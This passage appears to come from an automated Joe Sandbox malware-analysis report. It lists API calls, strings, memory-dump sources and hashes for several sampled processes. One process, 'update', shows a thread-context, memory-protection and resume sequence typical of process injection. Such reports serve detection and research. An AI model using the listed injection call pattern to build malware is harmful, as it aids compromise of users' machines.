                                                                                                            • Opcode Fuzzy Hash: 05cfcf3eada7e2669a2b3c44329737e18c20c45f7d8d48bc0da45499839481eb
                                                                                                            • Instruction Fuzzy Hash: AF11C435A00349DFDF19EBA8EC105AEFBB4FB4C710F5449A6E861A72B0D3706A40CB64
                                                                                                            APIs
                                                                                                            • RegisterWindowMessageW.USER32(WM_WINDOW_FOUND by Chameleon Folder), ref: 035E9A1A
                                                                                                            • RegisterWindowMessageW.USER32(WM_WINDOW_FOUND by Chameleon Folder 2,WM_WINDOW_FOUND by Chameleon Folder), ref: 035E9A2F
                                                                                                              • Part of subcall function 035E99A0: CreateThread.KERNEL32(00000000,00000000,035E9904,00000000,00000004,035F9420), ref: 035E99B2
                                                                                                              • Part of subcall function 035E99A0: SetThreadPriority.KERNEL32(?,00000002,035E9A44,WM_WINDOW_FOUND by Chameleon Folder 2,WM_WINDOW_FOUND by Chameleon Folder), ref: 035E99C4
                                                                                                              • Part of subcall function 035E99A0: ResumeThread.KERNEL32(?,?,00000002,035E9A44,WM_WINDOW_FOUND by Chameleon Folder 2,WM_WINDOW_FOUND by Chameleon Folder), ref: 035E99CF
                                                                                                            Strings
                                                                                                            • WM_WINDOW_FOUND by Chameleon Folder, xrefs: 035E9A15
                                                                                                            • WM_WINDOW_FOUND by Chameleon Folder 2, xrefs: 035E9A2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$MessageRegisterWindow$CreatePriorityResume
                                                                                                            • String ID: WM_WINDOW_FOUND by Chameleon Folder$WM_WINDOW_FOUND by Chameleon Folder 2
                                                                                                            • API String ID: 3626708800-2270766243
                                                                                                            • Opcode ID: b840280cf40e16d1d14935a295d29bf4ef7617c9b0edfaabd3a69e2a241497bb
                                                                                                            • Instruction ID: 96fcf26456aba956c4c925cb0947aed767baab31ddd0926267ed552134ad551d
                                                                                                            • Opcode Fuzzy Hash: b840280cf40e16d1d14935a295d29bf4ef7617c9b0edfaabd3a69e2a241497bb
                                                                                                            • Instruction Fuzzy Hash: 7001A4B86006459FE706EF14E080E69BBE1FB99300F54819AD8048B339C374E986EB91
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 03559CE9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 03559D47
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 03559DA4
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 03559DD7
                                                                                                              • Part of subcall function 03559C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,03559D55), ref: 03559CAB
                                                                                                              • Part of subcall function 03559C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,03559D55), ref: 03559CC8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: a45157c6cdef4d7b8416f201d0873f66d2e975ddb768e80d8208e542d3ed41d6
                                                                                                            • Instruction ID: f4ca31724ba336d0f8451d3810aaa3f7b380d29e875ea90761f5837a3164c1f8
                                                                                                            • Opcode Fuzzy Hash: a45157c6cdef4d7b8416f201d0873f66d2e975ddb768e80d8208e542d3ed41d6
                                                                                                            • Instruction Fuzzy Hash: 45316674A0021ADFDB10EFE5E894AEEB3B8FF44310F444566E911DB2A4D778AA05CB50
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 035E88F1
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 035E891E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: D
                                                                                                            • API String ID: 3850602802-2746444292
                                                                                                            • Opcode ID: 3f93b7c55d27016566684b4e250176af56d5ffc133f778d6810897a5b0df955e
                                                                                                            • Instruction ID: 91529574ed55b55dd46e0d23cad1e4662210765ff6e8c295a9e69a1cd5663342
                                                                                                            • Opcode Fuzzy Hash: 3f93b7c55d27016566684b4e250176af56d5ffc133f778d6810897a5b0df955e
                                                                                                            • Instruction Fuzzy Hash: 06111875E05249EFDB11CFE8C989BEEBBF4AB08700F144495E954EB391D3746A40CBA1
                                                                                                            APIs
                                                                                                            • GetWindowTextW.USER32(?,?,0000002A), ref: 035E7730
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow
                                                                                                            • String ID: Notification Area$Shell_TrayWnd
                                                                                                            • API String ID: 530164218-3088717331
                                                                                                            • Opcode ID: 962655374bfe0fd2270228ccbb9a9f6d9dc5202d0d3684cbb2ebc3ce710e3d1b
                                                                                                            • Instruction ID: ccd840bf168f683265c4c7987bc031e941a4d47c96c924e1ca8cf3b60f4d795a
                                                                                                            • Opcode Fuzzy Hash: 962655374bfe0fd2270228ccbb9a9f6d9dc5202d0d3684cbb2ebc3ce710e3d1b
                                                                                                            • Instruction Fuzzy Hash: 9F011E34A0434DAFDB04EBA8E85199DBBF9BF8D300F5144A6E814A7260E730BB049795
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,Snake List,00000000), ref: 035E7A70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindWindow
                                                                                                            • String ID: Snake List$bosa_sdm_
                                                                                                            • API String ID: 134000473-4107077030
                                                                                                            • Opcode ID: 07a25a469f695de909e229d57cc20ec9e31f5e9f5068a9cfdd9b361db21e9458
                                                                                                            • Instruction ID: cc7f0f4193480b679bfb23e57344442030defdb92bbde85f6de52fed017750b0
                                                                                                            • Opcode Fuzzy Hash: 07a25a469f695de909e229d57cc20ec9e31f5e9f5068a9cfdd9b361db21e9458
                                                                                                            • Instruction Fuzzy Hash: FFF06234B04749AFDB15DBA8EC61B5DBBF8FB8C700FA144E1FD10962A1E6726B108754
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,TFolderTreeView,00000000), ref: 035E7BFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindWindow
                                                                                                            • String ID: TFolderTreeView$TSelectFolderForm
                                                                                                            • API String ID: 134000473-2863556216
                                                                                                            • Opcode ID: 5cc21f0014c8c7c64e2cea96d43b72091c193402876f2d16fe8c61774e074a98
                                                                                                            • Instruction ID: cd84189c1490ae1442c5f315324834a8459c5ebf84c04432e5946dd3cef4cd5c
                                                                                                            • Opcode Fuzzy Hash: 5cc21f0014c8c7c64e2cea96d43b72091c193402876f2d16fe8c61774e074a98
                                                                                                            • Instruction Fuzzy Hash: A9F06234B04348AFDB15DBA8ED51B4DBBFCFB8D600F5144E1F804A66A1E6306A008654
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,SHBrowseForFolder ShellNameSpace Control,00000000), ref: 035E7B1A
                                                                                                            Strings
                                                                                                            • #32770, xrefs: 035E7B01
                                                                                                            • SHBrowseForFolder ShellNameSpace Control, xrefs: 035E7B0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindWindow
                                                                                                            • String ID: #32770$SHBrowseForFolder ShellNameSpace Control
                                                                                                            • API String ID: 134000473-4023719415
                                                                                                            • Opcode ID: cfea249a36f04524a499515f829f5241a16be0e281ea1f885e72a31305f6b344
                                                                                                            • Instruction ID: 4adff57d0c7b744b2a118ea92f982d8e8e82645fc4280a7e8df830ee3731bcd2
                                                                                                            • Opcode Fuzzy Hash: cfea249a36f04524a499515f829f5241a16be0e281ea1f885e72a31305f6b344
                                                                                                            • Instruction Fuzzy Hash: CBF09634B04388AFDB05DBA8EC61B4DBBFCFB8C700F5144E1F80097660F6706A009654
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,035F0493,00000000,035F04CA), ref: 0356D222
                                                                                                              • Part of subcall function 0355C13C: GetProcAddress.KERNEL32(?,?), ref: 0355C160
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                            • API String ID: 1646373207-1127948838
                                                                                                            • Opcode ID: 845a0f23cd805e95c3e39318e1f8b796e75e6a74987940a36b0b3783c268b6b0
                                                                                                            • Instruction ID: 191e649e5c381a770cd010b960578a671231b305ead5c09b4a69bbfae9fa2e14
                                                                                                            • Opcode Fuzzy Hash: 845a0f23cd805e95c3e39318e1f8b796e75e6a74987940a36b0b3783c268b6b0
                                                                                                            • Instruction Fuzzy Hash: 9DD05EBC7407468FDB20EBB2B890E0526F8F380208B00082666028B135C6B0D4099F01

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12%
                                                                                                            Dynamic/Decrypted Code Coverage:94.3%
                                                                                                            Signature Coverage:28.4%
                                                                                                            Total number of Nodes:141
                                                                                                            Total number of Limit Nodes:5

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • NtResumeThread.NTDLL(?,00000000), ref: 007A1546
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 007A1556
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeSleepThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1530989685-0
                                                                                                            • Opcode ID: 62dcd23f7042007decc734f2bb8c01832dea69bd06e8bcf8c2e68598dd1ccbad
                                                                                                            • Instruction ID: bd5443a4559f7fed71c9a852722585896df3ac5580eee66a4728a4657ed91971
                                                                                                            • Opcode Fuzzy Hash: 62dcd23f7042007decc734f2bb8c01832dea69bd06e8bcf8c2e68598dd1ccbad
                                                                                                            • Instruction Fuzzy Hash: DCD05E30540007EBE715AB60C989BB9F722BFC6700F448B60E16A49091D735AD90DF92

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • NtSetContextThread.NTDLL(?,?), ref: 007A142A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1591575202-0
                                                                                                            • Opcode ID: 192f66f9a1f54bf73833eec1adcf7babb407acbd44efd78573a2e8dfd83b320e
                                                                                                            • Instruction ID: 6d24c546ceaacee5c7cbd8b58231fc89bef58c8acdd1f7ec00d5fa478f5beb8f
                                                                                                            • Opcode Fuzzy Hash: 192f66f9a1f54bf73833eec1adcf7babb407acbd44efd78573a2e8dfd83b320e
                                                                                                            • Instruction Fuzzy Hash: 990145B5100542F7CA126F18C946E99B723FBD3781F648F10E41214523FB289C53ABB8

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,007A0FEC,00000040,007A0604,00000000,00000000,00000000,00000000,00000000), ref: 007A117B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                                                                            • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

                                                                                                            Control-flow Graph

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                            • Instruction ID: 1bb7ac543bbe846d7a8ac7755fdb1a741b1ee71f1df59aae87ea804b073dd816
                                                                                                            • Opcode Fuzzy Hash: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                            • Instruction Fuzzy Hash: 0E016276941214DFE720CF48CDC0E55B7F8FB4A760F858699EA449B711C378EC40CA66

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047A0C1
                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A0DE
                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A0EE
                                                                                                            • __vbaStrCat.MSVBVM60(0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A0FD
                                                                                                            • __vbaStrMove.MSVBVM60(0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A10A
                                                                                                            • __vbaStrCat.MSVBVM60(003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A115
                                                                                                            • __vbaStrMove.MSVBVM60(003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A122
                                                                                                            • __vbaStrCat.MSVBVM60(00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A12D
                                                                                                            • __vbaStrMove.MSVBVM60(00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A13A
                                                                                                            • __vbaStrCat.MSVBVM60(0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A145
                                                                                                            • __vbaStrMove.MSVBVM60(0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A152
                                                                                                            • __vbaStrCat.MSVBVM60(07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A15D
                                                                                                            • __vbaStrMove.MSVBVM60(07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A16A
                                                                                                            • __vbaStrCat.MSVBVM60(07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?), ref: 0047A175
                                                                                                            • __vbaStrMove.MSVBVM60(07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?), ref: 0047A182
                                                                                                            • __vbaStrCat.MSVBVM60(0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8), ref: 0047A18D
                                                                                                            • __vbaStrMove.MSVBVM60(0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8), ref: 0047A19A
                                                                                                            • __vbaStrCat.MSVBVM60(1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000), ref: 0047A1A5
                                                                                                            • __vbaStrMove.MSVBVM60(1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000), ref: 0047A1B2
                                                                                                            • __vbaStrCat.MSVBVM60(1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000), ref: 0047A1BD
                                                                                                            • __vbaStrMove.MSVBVM60(1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000), ref: 0047A1CA
                                                                                                            • __vbaStrCat.MSVBVM60(3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000), ref: 0047A1D5
                                                                                                            • __vbaStrMove.MSVBVM60(3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000), ref: 0047A1E2
                                                                                                            • __vbaStrCat.MSVBVM60(3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000), ref: 0047A1ED
                                                                                                            • __vbaStrMove.MSVBVM60(3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000), ref: 0047A1FA
                                                                                                            • __vbaStrCat.MSVBVM60(3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000), ref: 0047A205
                                                                                                            • __vbaStrMove.MSVBVM60(3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000), ref: 0047A212
                                                                                                            • __vbaStrCat.MSVBVM60(7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000), ref: 0047A21D
                                                                                                            • __vbaStrMove.MSVBVM60(7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000), ref: 0047A22A
                                                                                                            • __vbaStrCat.MSVBVM60(7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000), ref: 0047A235
                                                                                                            • __vbaStrMove.MSVBVM60(7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000), ref: 0047A242
                                                                                                            • __vbaStrCat.MSVBVM60(7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000), ref: 0047A24D
                                                                                                            • __vbaStrMove.MSVBVM60(7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000), ref: 0047A25A
                                                                                                            • __vbaStrCat.MSVBVM60(7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000), ref: 0047A265
                                                                                                            • __vbaStrMove.MSVBVM60(7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000), ref: 0047A272
                                                                                                            • __vbaStrCat.MSVBVM60(7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000), ref: 0047A27D
                                                                                                            • __vbaStrMove.MSVBVM60(7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000), ref: 0047A28A
                                                                                                            • __vbaStrCat.MSVBVM60(7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000), ref: 0047A295
                                                                                                            • __vbaStrMove.MSVBVM60(7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000), ref: 0047A2A2
                                                                                                            • __vbaStrCat.MSVBVM60(3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000), ref: 0047A2AD
                                                                                                            • __vbaStrMove.MSVBVM60(3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000), ref: 0047A2BA
                                                                                                            • __vbaStrCat.MSVBVM60(3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000), ref: 0047A2C5
